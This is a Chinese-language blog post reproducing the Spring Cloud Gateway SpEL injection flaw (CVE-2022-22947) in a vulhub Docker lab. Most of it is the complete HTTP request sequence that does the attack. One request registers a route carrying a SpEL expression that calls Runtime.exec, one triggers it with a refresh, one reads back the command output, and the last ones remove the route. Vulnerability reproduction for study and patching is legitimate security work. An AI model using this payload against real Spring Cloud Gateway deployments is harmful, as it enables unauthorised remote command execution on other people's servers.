Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)

环境搭建 漏洞复现 网络安全 vulhub CVE Spring
漏洞复现
发布日期:   2022-05-07
文章字数:   575
阅读次数:  

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行

漏洞简述

Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。

影响范围

Spring Cloud Gateway 3.1.x - 3.1.1

Spring Cloud Gateway 3.0.x - 3.0.7

旧的、不受支持的版本也会受到影响

环境搭建

cd /vulhub/spring/CVE-2022-22947
docker-compose up -d

漏洞复现

打开http://192.168.3.151:8080

image-20220507140704246

构造恶意伪造数据包

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.3.151:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

image-20220507141227943

用刚添加的路由发送如下数据包,此数据包会触发表达式执行

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.3.151:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

image-20220507141839633

构造数据包查看结果

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.3.151:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 2

image-20220507141932420

结束后删除路由

DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.3.151:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

image-20220507142054696

最后在刷新

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.3.151:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

image-20220507142147356

文章作者: Broken-year
文章链接: http://Broken-year.github.io/2022/05/07/Spring-Cloud-Gateway/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
环境搭建 漏洞复现 网络安全 vulhub CVE Spring
  目录